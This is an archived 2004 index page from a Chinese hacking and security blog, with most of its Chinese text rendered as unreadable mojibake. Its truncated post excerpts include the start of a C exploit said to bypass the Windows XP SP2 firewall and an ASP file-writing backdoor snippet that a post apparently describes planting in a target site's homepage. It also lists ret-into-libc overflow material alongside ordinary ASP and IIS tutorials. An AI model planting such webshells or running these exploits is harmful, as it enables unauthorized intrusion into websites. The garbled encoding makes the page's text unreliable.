¡º¹Â¹â½£Òş¡»
来源: BlogBus 原始链接: http://www.blogbus.com:80/blogbus/blog/index.php?blogid=42149&m=20041016 存档链接: https://web.archive.org/web/20041125200344id_/http://www.blogbus.com:80/blogbus/blog/index.php?blogid=42149&m=20041016
2004 Äê 10 Ô Sun Mon Tue Wen Thu Fri Sat 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ¡º¹Â¹â½£Òş¡» ¡ù ¼¼ÊõÊÇÒ»ÖÖ˼Ïë ¡ù¡¡¡¡¡¡¡¡
¡ù ¸ßÊÖÊÇÒ»ÖÖ¾³½ç ¡ù¡¡¡¡¡¡¡¡
¡ù ºÚ¿ÍÊÇÒ»ÖÖ¾«Éñ ¡ù¡¡¡¡¡¡¡¡ ¹ØÓÚRecordset³Ö¾ÃĞÔµÄÒ»µãµãÑо¿ ASPС͵(Ô¶³ÌÊı¾İ»ñÈ¡)³ÌĞòµÄÈëÃÅ½Ì³Ì ¶Ô¡¶µçÄÔ°®ºÃÕß¡·µÚ22ÆÚ¡¶¡°É±¡±³öÀ´µÄ²¡¶¾¡·Ò»ÎĵÄÖÊÒÉ ´Ó±à³Ì½Ç¶È·ÖÎö´«ÆæÄ¾Âí DISCUZ©¶´ÓëÌáÉıÈ¨ÏŞ ÔÚASPÖĞʵÏÖÒ³ÃæÓëÊı¾İ¿âÁ¬½ÓµÄ¼¸ÖÖʵÓ÷½·¨ PHPÔÚ°²È«·½ÃæµÄÁíÀàÓ¦Óà JSP°²È«ĞÔ³õ̽ »ùÓÚphp+MysqlµÄSQL Injection ¹¥»÷¼¼Êõ ËêÔÂÁªÃ˵ÄÊÍÒâ ¼ÅįͿѻ : ÔõôÏÖÔÚµÄÅ®º¢×Ó. sunlion[E.S.T] : XĞֵܵ½´ËÒ»ÓΣ¬º. º©¹· : Ğֵܣ¬°²È«·½ÃæµÄ. taynni : hoho,Ö§³Ö!!!µ½Ê±. flyweb : ²»´í¹ş×ö¸öÁ´½. dir : Êǵİ¡£¡ . dir : żÊÇÒ»ÑùµÄ°¡£¡°Ö. imin : À÷º¦°¡£¡ . ¶şÃ× : ÕâôºÃµÄµØ·½£¬Ö§. lichdr : »èѽ£¬ÎÒ²»ÊÇʲüN. [ ´æ µµ ] andy dreamtheater Angel showlife tx7do charcs chensun netsky xhacker jpxiong Flier lgx KKQQ Ziqi redsaga spy88B8 Luzhu NetKnave eVan SUNU Taynni wuhui CAT Neeao Iceberg kaspersky KusTa Hoky eviloctal lam Net¡¤PoliCe Jace Hardy Gusu¡¤Lanye lilo xiaolu knIfe mifor kaka Lo7e4L Super¡¤Hei lichdr yysun testnet soul Archonwang lamp FlyWeb evilhsu f2s hackfree powers Sunlion EvilPhive xeric icyfoxlovelace GuoMing swords | Ê×Ò³ | ¼¼ÊõÎÄÏ×(730) | ÒµÄÚ¹«¸æ(30) | ·ÖÒ³ ³£¼ûÍøÒ³¼ÓÃÜ·½·¨ºÍÆÆ½â¶Ô²ß
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ÓÒ¼üµ¯³ö´°¿Ú¼ÓÃÜ¡£³ÌĞòÈçÏ£º ´Ë·¨¶ÔIEÓĞÌØĞ§£¬µ«ÔÚNCÖĞÓÒ¼ü¶¨ÒåÎªÎŞ·¨¿ØÖƵİïÖú²Ëµ¥£¬ËùÒÔNCÖĞevent¶ÔÏóÎŞbuttonÊôĞÔ£¬ÔÚNCÖĞÓÒ¼ü- &.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ DNSÔÚ²Ù×÷ϵͳÖеļòµ¥ÅäÖÃ
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ÏÈÔÚÓ²Å̽¨Á¢ÓòºÍĞéÄâÖ÷»úµÄʵ¼ÊĿ¼£¬½¨Á¢ÒÔÏÂÈı¸öʵ¼ÊĿ¼£º c: \ inetpub\ wwwroot\ myweb c: \ inetpub\ wwwroot\ aaa c: \ inetpub\ wwwroot\ bbb ½¨Á¢ÓòºÍĞéÄâÖ÷»ú 1£®ÔÚNTÖĞ£¬ÔËĞв˵¥ÖĞNT4 Option PackÏÂMicrosoft Internet Information ServerÖеÄInternet Service Manager£» 2£®ÓÃÓÒ¼üµ¥»÷±¾¼ÆËã»úÃû£¬ÔÚµ¯³ö²Ëµ¥ÖĞÑ¡Ôñ¡°Ğ½¨¡±Öеġ°web Site¡±£»3£®ÔÚÕ¾µã˵Ã÷ÖмüÈë.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ QQÔ´´úÂë
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ;@echo off;goto compile ;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::;; QQ_Plugins.dll Ô´´úÂë;;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::.586.model flat, stdcalloption casemap :none ; case sensitive;::::::::::::.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ HTMLÔÚÏß±à¼Æ÷µÄµ÷Ó÷½·¨
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 HTMLÔÚÏß±à¼Æ÷²»ĞèÒª¶®µÃʹÓÃDreamweaver£¬»áÓÃWord¾Í»áʹÓÃ´Ë±à¼Æ÷£¬ÔÚÎÄÕÂϵͳ»òÕßÊÇĞÂÎÅϵͳĞèÒªÎÄ×ֱ༵Äweb³ÌĞòÖзdz£ÊµÓᣵ«ÊÇÈçºÎ½«html±à¼Æ÷ǶÈëµ½webÒ³ÖкÍÔõôȡµÃÀïÃæµÄÊı¾İÄØ£¿£¡Ê×ÏÈÎÒÃǼٶ¨ÎÒÃÇËùÒªµ÷ÓõÃHTMLÔÚÏß±à¼Æ÷·ÅÔÚÒ»¸öµ¥¶ÀµÃÒ³ÃæÖĞ£¬ÎļşÃûÊÇgledit.htmÉÏ´«Í¼Æ¬µÄÇ°Ì¨Ò³Ãæ£ºhttp://www.jfinfo.com/room/admin/img_upload.as.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ÈÆ¹ıXP SP2·À»ğǽµÄ´úÂë
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 Exploit:#include <windows.h>#include <winsock.h>#include <stdlib.h>#include <stdio.h>#include <winsock.h> void setfp(char buffer,int sz,DWORD from,DWORD fp){int i;for(i=0;i<sz-5;i++)if (buffer[i]=='\xb8'&&(DWORD*)(buffer+i+1)==from){(DWORD)(buffer+i+1)=fp;break;}} int injcode(char *buffer.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ »ñÈ¡SQL Server°æ±¾(Ô´´úÂë)
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 http://www.sqlsecurity.com/µÄChip Andrews·¢²¼µÄSQL ver£¬ÔÀ´ÊÇÓÃC#Ğ´µÄ£¬Å¼ÉÔÉÔ×÷ÁËÏÂĞŞ¸Ä£¬Ë³±ãѧϰһÏÂUnixÏÂSocket±à³Ì¡££º££© ±àÒë»·¾³£ºFreeBSD 5.2 (i386) £¨win32µÄ³ÌĞò¿ÉÒÔÔÚÕâÀïÏÂÔØhttp://www.xfocus.net/tools/200408/795.html£© #include #include in.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ·ÀÖ¹ACCESSÊı¾İ¿â±»ÏÂÔØµÄ9ÖÖ·½·¨
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ƪÊ×ÓÔÀ´¸ÄmdbΪasp¾ÍÄÜ·ÀÏÂÔØÊÇ¹í»°¡£ Òı×Ó£º×òÌìºÍanimatorÊÔÑéÁËһϣ¬°Ñdata.mdbÎļş¸ÄÃûΪdata.aspÎļşºó·ÅÔÚwwwrootĿ¼ÀȻºó ÔÚIEÖĞÊäÈëdata.asp·¾¶ºó£¬·¢ÏÖIEÏÔʾһƬ¿Õ°×£¬ÓÒ¼ü->²ì¿´Ô´Îļş£¬Ìø³ö¼Çʱ¾£¬½«ÄÚÈİÁí´æÎª.mdbÎļş £¬ÓÃACCESS´ò¿ª£¬·¢ÏÖĞèÒªÃÜÂ룬Ҳ¾ÍÊÇ˵ÖÁÉÙÎļşÍ·±»ÆÆ»µ¡£ È»ºóÓÃFlashgetÊÔÑéÏÂÔØdata.aspÎļş£¬²¢Áí´æÎªdata.mdbÎļş£¬·¢ÏÖÓÃACCESS´ò¿ªÍêºÃÎŞËğ£¡.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ²åÈëʽÃâɱºóÃÅ-½«ºóÃŷŵ½¶Ô·½Ö÷Ò³Àï
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 1.Ëæ±ãÕÒËûÒ»¸öÒ³Ãæ£¬È»ºó°ÑÈçÏÂÄÚÈİ·Ö¿ª²åÈëµ½ËüµÄÖ÷Ò³ÁË£¬×¢ÒâÒ»ÏÂÉÏÏÂÎÄ¡£ÄÚÈİ£¨fso): <% dim objFSO %><% dim fdata %><% dim objCountFile %><% on error resume next %><% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %><% if Trim(request("syfdpath"))<>"" then %><% fdata = request("cyfddata") %>.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ system()ÔÚÒç³öÖеÄÀûÓÃ
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 ½ü¼¸ÄêÀ´£¬¼ÆËã»úϵͳÔÚÔöÇ¿°²È«ĞÔÉÏÓĞÁ˺ܴóµÄ·¢Õ¹£¬Ò»Ğ©ÔöÇ¿Ğ͵ÄÄں˲¹¶¡Ö®À࣮ºÜºÃµØ·À·¶ÁËÒç³öµÄ±»ÀûÓã¬Ôì³ÉĞ´exploitµÄÄѶȴó´óÔö¼ÓÁË£®ExploitµÄ¼¼ÊõÒ²Ïà¶Ô²»¶Ï·¢Õ¹ÆäÖĞret-into-libc¼¼Êõ¿ÉÒԺܺõرܿªÄ³Ğ©ÏŞÖÆ£¬ÓÖÊÇĞ´exploitµÄÒ»ÌõÂŞÂí´óµÀ£® ¶Ô±È¡ªÏ²ÛͳµÄÒç³öÀûÓ÷½Ê½,expoit¹¹½¨Ò»¸öbuf,¸²¸ÇÁËnetµØÖ·È»ºóÌø×ªµ½ÓĞÒ»´ó´®NOPµÄÄÚ´æÄ³´¦£¬ÓÉÓÚNOPµÄÃî´¦NOPºóÃæµÄshellcod.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ASP¶ÔÊı¾İ¿â²Ù×÷µÄµäĞͲ½Öè¼òÃ÷½Ì³Ì
- [¼¼ÊõÎÄÏ×] ¹Â¹â½£Òş ·¢±íÓÚ 2004-10-16 <% 1 set cn=server.createobject("adodb.connection") '´´½¨Á¬½ÓÊı¾İ¿âËùÒªÓõ½µÄ¶ÔÏó cn 2 cn.open "...con_str..." 'µ÷ÓÃcnµÄopen·½·¨£¬²¢ÇÒÒÔË«ÒıºÅÖмäµÄ×Ö·û´®Îª²ÎÊı£¬´ò¿ªÊı¾İ¿â£¨¶ÔÊı¾İ¿â²Ù×÷֮ǰĞèÒª´ò¿ª£¬²Ù×÷ÍêÖ®ºóĞèÒª¹Ø±Õ¼´µ÷ÓÃcnµÄclose·½·¨£©¡£Ò²¿ÉÒÔÑ¡ÔñÓÃϵͳ»òÓû§Êı¾İÔ´£¬µ«²»ÍƼö£¬ÒòΪºÜ¶àʱºòûÓжÔĞéÄâÖ÷»úµÄ²Ù×÷È¨ÏŞ£¬ËùÒÔ¶àʹÓÃÁ¬½Ó×Ö·û´®¡£.............. ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | Trackback(0) | ±à¼ ·ÖÒ³ Ä£°åÉè¼Æ£º èóÃÎñöĞÄ